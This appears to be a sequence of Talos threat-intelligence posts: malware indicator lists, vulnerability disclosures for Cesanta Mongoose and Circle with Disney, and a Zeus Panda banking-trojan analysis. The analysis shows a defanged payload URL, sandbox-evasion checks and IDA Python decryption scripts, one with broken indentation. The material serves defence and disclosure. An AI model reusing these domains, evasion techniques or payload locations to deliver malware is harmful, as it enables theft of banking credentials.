• c50c70f782a7027ddfb9f40cf7fa09ba026db2e966485532c698020feb5092e1
• feab7aea76929e0eea394f319ac9943431ac408ac04b0682ec28c5208d2c0143
• 719b78cd00d5d5fd5da3fa786e8f9093169517d6d376dff95572bdd64092a282
• 1f4524411c3d875259f8ab03d7d8d2e6eff55a603d2986cd36e006ad7091df97
• 96e7b9cdf921c06747e68e19ed01c32eb3b8b2cfabde164dd993c75ccecef917
• 0e00dd23c72c45f60eb7fc7581a93e5b4975997108969a28bddb1b1dfa170ace
• ad3fac8f3b7e49c251cf829817f4f077072b7d9e4e697638836e4fccfee5693d
• 373ce9827a9626148e5c343250015be1fd6df270141f37129586321ba72ee601
• 5dbf9fb9db064cdc48d0b7e23aa50f7c22341b11ab848efe90c7355ff2f9d030
• e6d9afa1df88be5c5bc05c9b1fa4744aa8118c22eebc898769a96ad835c5e6e8
• dd72936abfd9887928cec7649f427c676067f05cbd23ba0e85f50533af49b2dd
• 4ac17bc6cbd38f7e0a93e221abd71a1771804871adf6638eefae70a36693dba6
• b04c4527a35a70d945eed540a6373bb2db4cae3a5c8ed79266d40f527f7e74a8

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Tovkater-6355575-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: IntranetName
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyServer
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: AutoConfigURL
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: AutoDetect
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyOverride

Mutexes

• !IECompat!Mutex
• Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs
• Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit
• MutexNPA_UnitVersioning_1288
• \BaseNamedObjects\MutexNPA_UnitVersioning_1908

IP Addresses

• 185[.]80[.]54[.]18
• 239[.]255[.]255[.]250

Domain Names

• chubbyoasis[.]top

Files and or directories created

• %TEMP%\nspB3BE.tmp\nsJSON.dll
• %TEMP%\nspB3BE.tmp\ihovet312.exe
• %Public%\Desktop\Download Download.lnk
• %TEMP%\nspB3BE.tmp\crub.exe

File Hashes

• 00e2316602cdc220d7d96b51ddb30c8686768172aa690dca61299599b432e4e1
• 09c6d7aa165da344e09575978d4ed279bfc7b538a21d19d8a983bf6c53f6fd63
• 0cc22fdb99248307ad676f62fdeea54bf531a4a736db87a68b5e99200fa22346
• 0d5abc8055d7075ddc380a2244c048be7df2e1528625f178bae28b9a385d8059
• 37e58e7f9c958a84bc1f9e993b88ac35b208835bcd78de647e61acca0674ffc5
• 390c133ff17c3dba9ad6a1f23300259a25bf347ce1871b7bda3137e2793dea9c
• 46266424dc446fa849f32e390c72f2158937de669596d1604e7debfe42d4b08c
• 4d1aa1730c5c825513dcab70b2d953f0b410a7d77ae24c37c80a6c7b064a84cc
• 5fe7ab0b58112c10da05503e9d16429bde3cfe4fc6a6084354ad2e53ce174ead
• 629988c5c0eca9431d34ec6c62966e0f524b60f9d958d34481bc7bd320ab530a
• 6daf4f85fd756c9f348bf6c37361933725c44866c9a0fd48f75b37459dc1c82f
• 6e302beef11ceff3ce6d7578f21bc5fb63ff95b30b3bc1bab6ee56d82aeaaa81
• 7aa4bc907b1db2373c3429b54f29ad7a8e2c26d8075dce51e2019b3908123d6b
• 993e6ca19189fc218aa72a58914fd44a18e928fd8d57cda419d5d707c80b8d56
• ac0cee4f6a3e327ea011b790f1bd279ff835e0af32f0f6a944c20ceee60ae65c
• acb488c1a11f6e4c74bb16677266f90136f636564660b3365b9cadf58a3b2fe0
• b3bf68fc33b354a9387dd582f348ce7c739a96cbf18a52398d8f67ecbcdf04b0
• be030179649c3c286ba386ce87cf2a7db4257b463d40d2fffd571801099f2209
• c620f230d09552f28a405d77f0a0aec3503a59fe329b01150ad975651419929f
• d6f21beb7b1033bef5de62b26e6e378909ddd54104cd92b2a0d359ef62f8d020
• e2197aebd08c65fb547461f7d4f3a86a70008743701828fbad4ff58266850958

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.WillExec-6356235-0

Indicators of Compromise

Registry Keys

• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
• Value: DelayedAutostart
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: dgprf
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER
• Value: DisableAntiSpyware
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
• Value: Start
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run
• <HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender

Mutexes

• Hej2ffi2jd4slfe

IP Addresses

• N/A

Domain Names

• LKEXIVL[.]RU
• HDYKVXN[.]RU
• ebfrtgx[.]ru
• PIBSCXI[.]RU
• indvaws[.]ru
• mfwvokl[.]ru
• UOEVSFM[.]RU
• JTPXQRU[.]RU
• KAQELMY[.]RU
• BGYMVRR[.]RU
• XQTNVLM[.]RU
• lkexivl[.]ru
• MFWVOKL[.]RU
• EBFRTGX[.]RU
• HTTHUED[.]RU
• dtrxcms[.]ru
• QTKIHPS[.]RU
• lqwuhot[.]ru
• bgymvrr[.]ru
• UPSCDOQ[.]RU
• DTRXCMS[.]RU
• qtkihps[.]ru
• FACJGHS[.]RU
• pibscxi[.]ru
• xlvudsp[.]ru
• rmcltni[.]ru
• LTYHVWD[.]RU
• ADOHBTT[.]RU
• hdykvxn[.]ru
• xqtnvlm[.]ru
• upscdoq[.]ru
• LQWUHOT[.]RU
• facjghs[.]ru
• INDVAWS[.]RU
• htthued[.]ru
• XLVUDSP[.]RU
• jtpxqru[.]ru
• RMCLTNI[.]RU
• ltyhvwd[.]ru
• kaqelmy[.]ru
• uoevsfm[.]ru
• adohbtt[.]ru

Files and or directories created

• %TEMP%\dd.te
• %AppData%\xxudxudr\ucqupaug.exe

File Hashes

• 392f1054815c5f805d50b60ea261210012bdda386158a1da92d992a929eb77c2
• 03b2164da6318fff63b6cad2fc613c3d885bd65432a7b8744c2b1709f2f9a479
• 69a36e6f12b4e9b9cd15528a068385f2311b0c540336c142aabdd73c2a2e2015
• a63a5639d0cb6a10f7af5bd0dd30ca1800958a0f5bb47f358b6d37f51d0f0a31
• 2ae61c8c2a8e83cde33f38b89599032a6fb455256aa414a15f2724c94d3460d2
• 40cfb7b7fad1602276ebf3fa63514ba91be6186d5d3bd190f593bdec0b6d8d64
• 76d7a19cd2700dfe9e209f7a90b65f505ea14936dca3a5b00bd3b61c2c6ee386
• 9a339f2cbd25fcd821e6a1d37744280007f4ce016e93c6fb8c7c9e0ef8dfaf06
• a012c26e70ecdc13a644ef53d1202d3d1b2a53c70046ccedb12c97a00844ef73
• fa7e5cdf59d30ade201e91f0543a03f581ff5f95ddc74bccf7590663de3a6a01

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Zusy-6357526-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: F9E7DE7B
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: internat.exe
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run
• <HKU>\Software\Microsoft\Windows\CurrentVersion\Run

Mutexes

• F9E7DE7B
• \BaseNamedObjects\5D79E0A3

IP Addresses

• 239[.]255[.]255[.]250
• 216[.]218[.]185[.]162

Domain Names

• spaines[.]pw

Files and or directories created

• %AppData%\5D79E0A3\bin.exe
• %AppData%\F9E7DE7B\bin.exe

File Hashes

• 016edac60334e306af5a5cccc5820294b0fa91ee0e5ea71e655c4632e8998347
• bdd213dad416f81f8b76a7463c20500ee789c8d44371cf62c061a0aa6c232472
• b1fdd5250ab7300da229a091f58e655e2aade24c38cd280af4cd8cb79af30203
• 1d2b1f2f844f40bcbdf614d4c38d3c4fde7a36d9102b7e13cc05abfa2c6bf593
• a27d0e059e9d56b31e06899bd7287ee8e05f10b8da04124d9ad1fbc633cff893
• 3c27beb77c3261ceb55eaee2d32a193ca4a53432a3a188fd9494202b94736522
• b5b46370c593ae3c32042355ff5d234b597d4f2685706f4f978006834483a689
• 13bf1d8d2fc96ec4ad92225a77d212e2d41ad09ffee5061de73124a6662aa792
• 1c5ba0cb523cd3c713c24c75cfa28885ef542f2226b25151ebafa3ecdde4e827
• eef6f6d965da6f45e376eb9e5e01451ea110466e4b02780625cd5170edad4119

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos

Today, Talos is disclosing several vulnerabilities that have been identified in Cesanta Mongoose server.

Cesanta Mongoose is a library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms. The small size of the software enables any Internet-connected device to function as a web server. Mongoose is available under GPL v2 and commercial licenses.
All these discovered vulnerabilities are fixed in version 6.10 of the library.

Vulnerability Details

TALOS-2017-0398 (CVE-2017-2891) - Cesanta Mongoose HTTP Server CGI Remote Code Execution Vulnerability

TALOS-2017-0398 manifests itself as an exploitable use-after-free vulnerability that exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of a previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over the network to trigger this vulnerability.

TALOS-2017-0399 (CVE-2017-2892) - Cesanta Mongoose MQTT Payload Length Remote Code Execution

TALOS-2017-0399 manifests itself as an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an out of bounds and arbitrary memory read and write, potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.

TALOS-2017-0400 (CVE-2017-2893) - Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service

TALOS-2017-0400 describes an exploitable NULL pointer dereference vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to a server crash and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.

TALOS-2017-0401 (CVE-2017-2894) - Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution

TALOS-2017-0401 is an exploitable stack buffer overflow vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.

TALOS-2017-0402 (CVE-2017-2895) - Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak

TALOS-2017-0402 documents an exploitable arbitrary memory read vulnerability that exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an out of bounds and arbitrary memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.

TALOS-2017-0416 (CVE-2017-2909) - Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service

TALOS-2017-0416 describes an infinite loop programming error that exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over the network to trigger this vulnerability.

TALOS-2017-0428 (CVE-2017-2921) - Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability

TALOS-2017-0428 is an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow leading to a heap buffer overflow resulting in denial of service and potentially remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.

TALOS-2017-0429 (CVE-2017-2922) - Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability

TALOS-2017-0429 describes an exploitable memory corruption vulnerability that exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which can lead to use-after-free vulnerability that can be exploited to achieve remote code execution. An attacker may be able to send a specially crafted websocket packet over the network to trigger this vulnerability.

For the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website:

http://www.talosintelligence.com/vulnerability-reports/

Discussion

IoT devices often have limited processing and memory resources but they also require lightweight and resilient communications protocols. One of the protocols frequently used for IoT and mobile messaging applications is MQ Telemetry Transport (MQTT).

MQTT is a lightweight network protocol used for publish/subscribe messaging between devices. MQTT is a standard protocol accepted by the OASIS consortium for the adoption of open standards.

The protocol is designed to be open, simple and easy to implement, allowing thousands of lightweight clients to be supported by a single server. The design attempts to minimize bandwidth requirements while attempting to ensure reliability of delivery.

Cesanta Mongoose is a popular communications library designed for implementation as a lightweight embedded library supporting several server and client application layer protocols, such as HTTP, MQTT, WebSockets, DNS and CoAP. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all popular IoT platforms.

These vulnerabilities discovered by Talos may allow attackers to take over implementations of vulnerable versions of the Cesanta Mongoose server and control individual devices as well as the associated servers running it. Users are recommended to work with the affected device vendors to ensure that the latest security patches for Cesanta Mongoose are applied to all vulnerable devices and applications.

Coverage

The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules:

• 23039 - 23040

Overview

Cisco Talos is disclosing several vulnerabilities identified in Circle with Disney. Circle with Disney is a network device designed to monitor the Internet use of children on a given network. Circle pairs wirelessly, with your home Wi-Fi and allows you to manage every device on the network, tablet, TV, or laptop. It can also pair via ethernet after the initial pairing. Using an iOS or Android app, families create unique profiles for every member of the home and from there, help shape each person's online experience.

The security team at Circle Media has been exemplary to work with from initial vulnerability discovery to release. They have been responsive and open to communication. Additionally, the Circle with Disney was designed such that software updates are pushed down to customer devices when they become available. Customers who have received these updates are protected against these vulnerabilities.

Through these exploitable vulnerabilities a malicious attacker could gain various levels of access and privilege, including the ability to alter network traffic, execute arbitrary remote code, inject commands , install unsigned firmware, accept a different certificate than intended, bypass authentication, escalate privileges, reboot the device, install a persistent backdoor, overwrite files, or even completely brick the device.

Details

TALOS-2017-0370 -- CVE-2017-2864

An exploitable vulnerability exists in the generation of authentication token functionality of Circle with Disney. Specially crafted network packets can cause a valid authentication token to be returned to the attacker resulting in authentication bypass. An attacker can send a series of packets to trigger this vulnerability.

TALOS-2017-0371 -- CVE-2017-2865

An exploitable vulnerability exists in the firmware update functionality of Circle with Disney. Specially crafted network packets can cause the product to run an attacker-supplied shell script. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2017-0372 -- CVE-2017-2866

An exploitable vulnerability exists in the /api/CONFIG/backup functionality of Circle with Disney. Specially crafted network packets can cause a os command injection. An attacker can send a http request trigger this vulnerability.

TALOS-2017-0388 -- CVE-2017-2881

An exploitable vulnerability exists in the torlist update functionality of Circle with Disney. Specially crafted network packets can cause the product to run an attacker-supplied shell script. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2017-0389 -- CVE-2017-2882

An exploitable vulnerability exists in the servers update functionality of Circle with Disney. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

TALOS-2017-0390 -- CVE-2017-2883

An exploitable vulnerability exists in the database update functionality of Circle with Disney. Specially crafted network packets can cause the device to execute arbitrary code. An attacker needs to impersonate a remote server in order to trigger this vulnerability.

TALOS-2017-0391 -- CVE-2017-2884

An exploitable vulnerability exists in the user photo update functionality of Circle with Disney. A repeated set of specially crafted API calls can cause the device to corrupt essential memory, resulting in an effectively bricked device. An attacker needs network connectivity to the device to trigger this vulnerability.

TALOS-2017-0396 -- CVE-2017-2889

An exploitable Denial of Service vulnerability exists in the API daemon of Circle with Disney. A large amount of simultaneous TCP connections causes the APID daemon to repeatedly fork, causing the daemon to run out of memory and trigger a device reboot. An attacker needs network connectivity to the device to trigger this vulnerability.

TALOS-2017-0397 -- CVE-2017-2890

An exploitable vulnerability exists in the /api/CONFIG/restore functionality of Circle with Disney. Specially crafted network packets can cause an OS command injection. An attacker can send an HTTP request trigger this vulnerability.

TALOS-2017-0405 -- CVE-2017-2898

An exploitable vulnerability exists in the signature verification of the firmware update functionality of Circle with Disney. Specially crafted network packets can cause an unsigned firmware to be installed in the device resulting in arbitrary code execution. An attacker can send a series of packets to trigger this vulnerability.

TALOS-2017-0418 -- CVE-2017-2911

An exploitable vulnerability exists in the rclient SSL validation in the remote control functionality of the Circle with Disney. Certificates for specific domain names can cause the product to accept a different certificate than intended. An attacker can host an HTTPS server with this certificate to trigger this vulnerability.

TALOS-2017-0419 -- CVE-2017-2912

An exploitable vulnerability exists in the goclient SSL validation in the remote control functionality of the Circle with Disney. SSL certificates for specific domain names can cause the product to accept a different certificate than intended. An attacker can host an HTTPS server with this certificate to trigger this vulnerability.

TALOS-2017-0420 -- CVE-2017-2913

An exploitable vulnerability exists in the libbluecoat.so SSL validation in the remote control functionality of the Circle with Disney. SSL certificates for specific domain names can cause the product to accept a different certificate than intended. An attacker can host an HTTPS server with this certificate to trigger this vulnerability.

TALOS-2017-0421 -- CVE-2017-2914

An exploitable authentication bypass vulnerability exists in the API daemon of Circle with Disney running firmware 2.0.1. A specially crafted token can bypass the authentication routine of the Apid binary, causing the device to grant unintended administrative access. An attacker needs network connectivity to the device to trigger this vulnerability.

TALOS-2017-0422 -- CVE-2017-2915

An exploitable vulnerability exists in the WiFi configuration functionality of Circle with Disney. A specially crafted SSID can cause the device to execute limited length shell commands, resulting in code execution. An attacker needs to send a couple of HTTP requests and setup an access point reachable by the device to trigger this vulnerability.

TALOS-2017-0423 -- CVE-2017-2916

An exploitable vulnerability exists in the /api/CONFIG/restore functionality of Circle with Disney. Specially crafted network packets can cause an arbitrary file to be overwritten. An attacker can send an HTTP request trigger this vulnerability.

TALOS-2017-0424 -- CVE-2017-2917

An exploitable vulnerability exists in the notifications functionality of Circle with Disney. Specially crafted network packets can cause an OS command injection. An attacker can send an HTTP request trigger this vulnerability.

TALOS-2017-0435 -- CVE-2017-12083

An exploitable information disclosure vulnerability exists in the Circle with Disney Apid daemon. A specially crafted set of packet can make the Disney Circle dump strings from an internal database into an HTTP response. An attacker needs network connectivity to the Internet to trigger this vulnerability.

TALOS-2017-0436 -- CVE-2017-12084

A backdoor vulnerability exists in remote control functionality of Circle with Disney. A specific set of network packets can remotely start an SSH server on the device, resulting in a persistent backdoor. An attacker send an API call to enable the SSH server.

TALOS-2017-0437 -- CVE-2017-12085

An exploitable routing vulnerability exists in the Circle with Disney cloud infrastructure. A specially crafted packet can make the Circle cloud route a packet to any arbitrary Circle device. An attacker needs network connectivity to the Internet to trigger this vulnerability.

TALOS-2017-0439 -- CVE-2017-12087

An exploitable heap overflow vulnerability exists in the Circle with Disney mdnsd daemon. A specially crafted packet can make the Circle overwrite an arbitrary amount of data on the heap with attacker controlled values. An attacker needs network connectivity to the Circle to trigger this vulnerability.

TALOS-2017-0446 -- CVE-2017-12094

An exploitable vulnerability exists in the WiFi Channel parsing of Circle with Disney. A specially crafted SSID can cause the device to execute limited length sed commands. An attacker needs to setup an access point reachable by the device to trigger this vulnerability.

TALOS-2017-0448 -- CVE-2017-12096

An exploitable vulnerability exists in the WiFi management of Circle with Disney. The Circle device will always connect to the configured Access Point SSID, even if the security option changes. An attacker needs to setup an Access Point reachable by the device and to send a series of spoofed "deauth" packets to trigger this vulnerability.

This blog post was authored by Edmund Brumaghin, Earl Carter and Emmanuel Tacheau.

Summary

It has become common for users to use Google to find information that they do not know. In a quick Google search you can find practically anything you need to know. Links returned by a Google search, however, are not guaranteed to be safe. In this situation, the threat actors decided to take advantage of this behavior by using Search Engine Optimization (SEO) to make their malicious links more prevalent in the search results, enabling them to target users with the Zeus Panda banking Trojan. By poisoning the search results for specific banking related keywords, the attackers were able to effectively target specific users in a novel fashion.

By targeting primarily financial-related keyword searches and ensuring that their malicious results are displayed, the attacker can attempt to maximize the conversion rate of their infections as they can be confident that infected users will be regularly using various financial platforms and thus will enable the attacker to quickly obtain credentials, banking and credit card information, etc. The overall configuration and operation of the infrastructure used to distribute this malware was interesting as it did not rely on distribution methods that Talos regularly sees being used for the distribution of malware. This is another example of how attackers regularly refine and change their techniques and illustrates why ongoing consumption of threat intelligence is essential for ensuring that organizations remain protected against new threats over time.

Initial Attack Vector

The initial vector used to initiate this infection process does not appear to be email based. In this particular campaign, the attacker(s) targeted specific sets of search keywords that are likely to be queried by potential targets using search engines such as Google. By leveraging compromised web servers, the attacker was able to ensure that their malicious results would be ranked highly within search engines, thus increasing the likelihood that they would be clicked on by potential victims.

In one example, the attacker appeared to target the keyword search containing the following search query:
In most instances, the attacker was able to get their poisoned results displayed several times on Page 1 of the Search Engine Results Page (SERP) for the keyword search being targeted, in this case "al rajhi bank working hours in ramadan". A sample of the malicious results returned by Google is included in the image below.
By leveraging compromised business websites that have received ratings and reviews, the attacker could make the results seem more legitimate to victims, as can be seen by the star/rating displayed alongside the results in the SERP.

The attacker targeted numerous keyword groups, with most being tailored towards banking or financial-related information that potential victims might search for. Additionally, certain geographic regions appear to be directly targetedy, with many of the keyword groups being specific to financial institutions in India as well as the Middle East. Some examples of keyword searches being targeted by this campaign were:

    "nordea sweden bank account number"
    "al rajhi bank working hours during ramadan"
    "how many digits in karur vysya bank account number"
    "free online books for bank clerk exam"
    "how to cancel a cheque commonwealth bank"
    "salary slip format in excel with formula free download"
    "bank of baroda account balance check"
    "bank guarantee format mt760"
    "free online books for bank clerk exam"
    "sbi bank recurring deposit form"
    "axis bank mobile banking download link"

Additionally, in all of the cases Talos analyzed, the titles of the pages that functioned as the entry point into this malware distribution system had various phrases appended to them. Using the "intitle:" search parameter, we were able to positively identify hundreds of malicious pages being used to perform the initial redirection that led victims to the malicious payload. Some examples of these phrases are included below:

    "found download to on a forum"
    "found global warez on a forum"
    "can you download free on the site"
    "found download on on site"
    "can download on a forum"
    "found global downloads on forum"
    "info site download to on forum"
    "your query download on site"
    "found download free on a forum"
    "can all downloads on site"
    "you can open downloads on"

In cases where victims attempt to browse to the pages hosted on these compromised servers, they would initiate a multi-stage malware infection process, as detailed in the following section.

Ironically we have observed the same redirection system and associated infrastructure used to direct victims to tech support and fake AV scams that display images informing victims that their systems are infected with Zeus and instructing them to contact the listed telephone number.

Infection Process

When the malicious web pages are accessed by victims, the compromised sites use Javascript to redirect clients to Javascript hosted on an intermediary site.
This results in the client retrieving and executing Javascript located at the address specified by the document.write() method. The subsequent page includes similar functionality, this time resulting in an HTTP GET request to another page.
The intermediary server will then respond with a HTTP 302 which redirects clients to another compromised site which is actually being used to host a malicious Word document. As a result, the client will follow this redirection and download the malicious document. This is a technique commonly referred to as "302 cushioning" and is commonly employed by exploit kits.
Following the redirect results in the download of a malicious Microsoft Word document.
Following the download of the malicious Word document, the victim is prompted by their browser to Open or Save the file. When opened, the document displays the following message, prompting the victim to "Enable Editing" and click "Enable Content".
Following these instructions will result in the execution of malicious macros that have been embedded in the Word document. It is these macros that are responsible for downloading and executing a PE32 executable, thus infecting the system. The macro code itself is obfuscated, and quite basic. It simply downloads the malicious executable, saves it into the %TEMP% directory on the system using the filename such as "obodok.exe".
In this case, the malicious executable was being hosted at the following URL:

    hXXp://settleware[.]com/blog/wp-content/themes/inove/templates/html/krang.wwt

The macros use the following Powershell command to initiate this process:
A review of DNS related information associated with the domain hosting the malicious executable shows that there were two significant spikes in the amount of DNS requests attempting to resolve the domain, occurring between 06/07/2017 and 06/08/2017.
Settleware Secure Services, Inc. is a document e-Signing service that allows documents to be signed electronically. It is used across a number of different processes, including Real Estate escrow e-Signing, and also offers eNotary services.

Malware Operations

The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware.

The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings:

• LANG_RUSSIAN
• LANG_BELARUSIAN
• LANG_KAZAK
• LANG_UKRAINIAN

The malware also performs checks to determine whether it is running within the following hypervisor or sandbox environments:

• VMware
• VirtualPC
• VirtualBox
• Parallels
• Sandboxie
• Wine
• SoftIce

It also checks for the existence of various tools and utilities that malware analysts often run when analyzing malicious software. A full list of the different environment checks performed by the malware is below:
If any of the environmental checks are met, the malware then removes itself by first writing a batch file to the %TEMP% directory and executing it using the Windows Command Processor. The malware uses RDTSC to calculate the time-based filename used to store the batch file. This batch file is responsible for deleting the original sample executable. Once the original executable has been deleted, the batch file itself is also removed from %TEMP%.
In an attempt to hinder analysis, the initial stage of the malicious payload features hundreds of valid API calls that are invoked with invalid parameters. It also leverages Structured Exception Handling (SEH) to patch its own code. It queries and stores the current cursor position several times to detect activity and identify if it is being executed in a sandbox or automated analysis environment. An example of the use of valid API calls with invalid parameters is below, where the call to obtain the cursor location is valid, while the call to ScreentoClient contains invalid parameters.
Below is an example of a bogus call designed to lure an analyst and increase the time and effort required to analyze the malware. Often we see invalid opcodes used to lure the disassembler, but in this case, the result is that it is in front of hundred of structures too, making it more difficult to recognize good variables.
The below screenshot shows a list of auto populated and useless structures by IDA. These measures are all designed to impede the analysis process and make it more expensive to identify what the malware is actually designed to do from a code execution flow perspective.
Periodically, we can find a valid and useful instruction. Below the EAX register is stored in a variable to be reused later in order to allocate a heap memory chunk to initiate its own unpacked code.
The malware also uses others techniques to make analysis significantly more difficult, like creating hundreds of case comparisons, which makes tracing code much harder.

Below an example of several if conditional statements in pseudo code demonstrating this process and how it can result in impeding the ability to efficiently trace the code.
In order to decrypt the malware code it's installs an exception handler, which is responsible for decrypting some memory bytes to continue it's execution.

Below you can see the SEH has just been initialized:
In the same routine, it performs the decryption routine for the following code. We also observed that the high number of exception calls were causing some sandboxes to crash as a way to prevent automated analysis.
Once the data is decrypted and stored into the buffer that was previously allocated, it continues execution back in winmain using a known mechanism, the callback routine feature of EnumDisplayMonitor, by setting up the value of the callback routine towards the patched memory.

During this execution, the malware will then continue to patch itself and continue execution.

The strings are encrypted using an XOR value, however each string uses a separate XOR value preventing an easy detection mechanism. Below is some IDA Python code which can be used to decrypt strings.

def decrypt(data, length, key):
    c = 0
    o = ''
    while c < length:
        o += chr((c ^ ord(data[c]) ^ ~key) & 0xff)
        c +=1
    return o

def get_data(index):
    base_encrypt = 0x1251A560
    key = Word(base_encrypt+8*index)
    length=Word(base_encrypt+2+8*index)
    data=GetManyBytes(Dword(base_encrypt+4+8*index), length)
    return key, length, data

def find_entry_index(addr):
    addr = idc.PrevHead(addr)
    if GetMnem(addr) == "mov" and "ecx" in GetOpnd(addr, 0):
        return GetOperandValue(addr, 1)
    return None

for addr in XrefsTo(0x1250EBD2, flags=0):
    entry = find_entry_index(addr.frm)
    try:
        key, length, data = get_data(entry)
        dec = decrypt(data, length, key)
        print "Ref Addr: 0x%x | Decrypted: %s" % (addr.frm, dec)
        MakeComm(addr.frm, ' decrypt_string return :'+dec)
        MakeComm(ref, dec)
    except: 
        pass

This code should comment IDA strings decrypted and referenced where 0x1250EBD2 corresponds to the decryption routine and 0x1251A560 corresponds to the table of strings encrypted

Comments are inserted into the disassembly making it much easier to understand the different features within the malware.

For API calls, there are also well known hash API calls which use the following algorithm. Again this is code which can be used within IDA in order to comment API calls.

def build_xor_api_name_table():
    global table_xor_api
    if not table_xor_api:
        table_xor_api = []
        entries = 0
        while entries < 256:
            copy_index = entries
            bits = 8
            while bits:
                if copy_index & 1:
                    copy_index = (copy_index >> 1) ^ 0xEDB88320
            else:
                copy_index >>= 1
            bits -= 1
        table_xor_api.append(copy_index)
        entries += 1
    return table_xor_api

def compute_hash(inString):
    global table_xor_api
    if not table_xor_api:
        build_xor_api_name_table()

if inString is None:
    return 0
ecx = 0xFFFFFFFF
for i in inString:
    eax = ord(i)
    eax = eax ^ ecx
    ecx = ecx >> 8
    eax = eax & 0xff
    ecx = ecx ^ table_xor_api[eax]
ecx = ~ecx & 0xFFFFFFFF
return ecx

The malware uses a generic function which takes the following arguments:

• the DWORD which corresponds to the module.
• An index entry corresponding to the table of encrypted string for modules (if not loaded).
• The hash of the API itself.
• The index where to store the api call address.

Below is example pseudo code showing how the API call is performed just to perform a process lookup into memory using the snapshot list.

Once the malware begins its full execution, it copies an executable to the following folder location:

C:\Users\<Username>\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\

It maintains persistence by creating the following registry entry:

